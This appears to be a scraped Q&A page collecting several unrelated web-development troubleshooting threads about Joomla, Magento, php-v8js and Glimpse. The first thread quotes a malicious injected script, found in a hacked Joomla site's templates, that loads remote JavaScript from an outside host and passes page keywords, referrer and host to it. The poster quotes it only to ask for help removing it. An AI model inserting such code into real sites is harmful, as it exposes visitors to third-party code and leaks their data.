joomla reading from unkown server - joomla

recently I've noticed that before my site is loaded, it starts to load data from some andrew.halocircle.com site. I think that either my joomla was hacked or I downloaded some wrong extension. The question is what to do now. Should I do clean install of Joomla or is there any simplier solution? Any help would by highly appreciated.
Here is the code which I find ins source code of page, which in my opinion, shouln't be there. Could someone tell me what the code is doing? Is it harmful?
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://andrew.halocircle.com/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://andrew.halocircle.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

I've managed to solved the issue for now by manually deleted the harmful script from every index.php page from hosting (from all joomla templates).

Your website is most likely hacked. Try this super fast cleanup instructions: http://www.itoctopus.com/a-super-fast-way-to-clean-a-hacked-joomla-website
Make sure that once you cleanup your website, you only allow the "index.php" file to be executed by Apache.
Hope this helps!

Related

How to install php-v8js on window

Now, i using vuejs and laravel. when i see view page source (Ctrl+U) but have not html code.I went to find in google.And found need to use Server side rendering
(I learned form https://medium.com/js-dojo/server-side-rendering-with-laravel-vue-js-2-5-6afedd64aa90) But problem is "Class 'V8Js' not found"
Someone can help ?
sorry I don't speak English that well
The problem is, that V8JS is a PHP library, that is not shipped by default and you have to compile it by yourself. You can learn more about it and how to install it on it's GitHub page. Follow the installation instructions for your local machine operating system and you should be good to go. If you would like to deploy your app to your hosting provider, first you have to make sure that your host has this PHP extension compiled and enabled. Hopefully this helps you :)

Joomla 1.0.15 to 1.5 Migrator component

Does anyone know where I can find the Joomla 1.0.15 to 1.5 Migrator component that's supposed to be here? Pasamio Project's FRS site. For some reason I just get "Permission denied" when I follow that link.
I realize that this is an OLD version, which is why I'm trying to get rid of it.
Thanks!
Looks like the code is no longer accessible; there is an item on the tracker regarding this.
I put a copy of it into my dropbox, where it will stay accessible as long as I have an account there. You are welcome to download it from there.

Head.phtml shows twice in source code on category pages

In the source code the head.phtml is loaded twice, once the way it should be and once between the content and footer. I replaced all magento's original files on the server and temperary switched to the default template, wich didn't solve the problem.
See the following link:
http://www.qxsystems.net/laptops.html
I asume that the issue is coused by a module or by a magento setting in the backend.
Could somebody provide me with some ways of troubleshooting this issue without removing all modules?
Many thx for any assistance!
PS: A module was to blame: Named 'priceranges'
thx for all the help!
If you have replaced the original files and also changed the template and still no change then it is surely a cache issue. Refresh your cache.
If still doesn't solves your problem then it must be some external modules issue.
If the problem is not solved then give a screenshot of your webpage with TemplatePathHints turned on, then it will be easier to tell where exactly is the problem.

Joomla voting doesn't save

I have a problem I cant figure out. When I started the website the voting system worked... but now many hours later it doesn't save the vote anymore.
I hope some of you have tried the same or have an idea about what can be wrong.
You can see a post on my site here: http://secretinvizimals.com/index.php/10-invizimals-the-lost-tribes/39-lizard-queen
BR
Rather hard to tell only by looking at it and not having access to the code, so these are the only things I can suggest.
Ensure you have the latest Joomla version (2.5.6)
Switch to the default Joomla template and try voting again.
Install JDump to see if its a PHP related problem.
Install a fresh copy of Joomla and your template on a subdomain and after each extension you install, test the vote.

Glimpse for ASP.NET Mystery Folder

I've installet the Glimpse NuGet package in my ASP.Ntt MVC3 web project. I'm getting errors on the web server because in my _Layout.cshtml master page there is the following reference:
<script src="#Url.Content("~/Glimpse/Resource/?resource=Pager")" type="text/javascript"></script>
There is no Glimpse directory anywhere in the web project, though. So something is wrong here.
I can't find any clues in the Glimpse documentation (which is better than most). So, is that directory supposed to be there? What puts it there? Why isn't it there on my system? Should I just remove the reference from my _Layout.cshtml?
I've tried re-installing the Glimpse NuGet package but that doesn't fix things. Any ideas how to fix this?
I'm not sure how you are getting that script tag added to your layouts file, as Glimpse does not require modifications to anything in your application except configuration.
You should be able to remove that line.
Further, let us know all of the Glimpse packages you have installed and we'll look into any misbehaving packages.
Actually one thing that i found using google that this is somehow linked to ELMAH logger:
https://github.com/Glimpse/Glimpse/issues/73
Hope that will help you or give the idea
It's most likely (supposed to be?) handled by MVC routing. Looks like the code for Glimpse is here: https://github.com/Glimpse/Glimpse/ so dig in. :D

Resources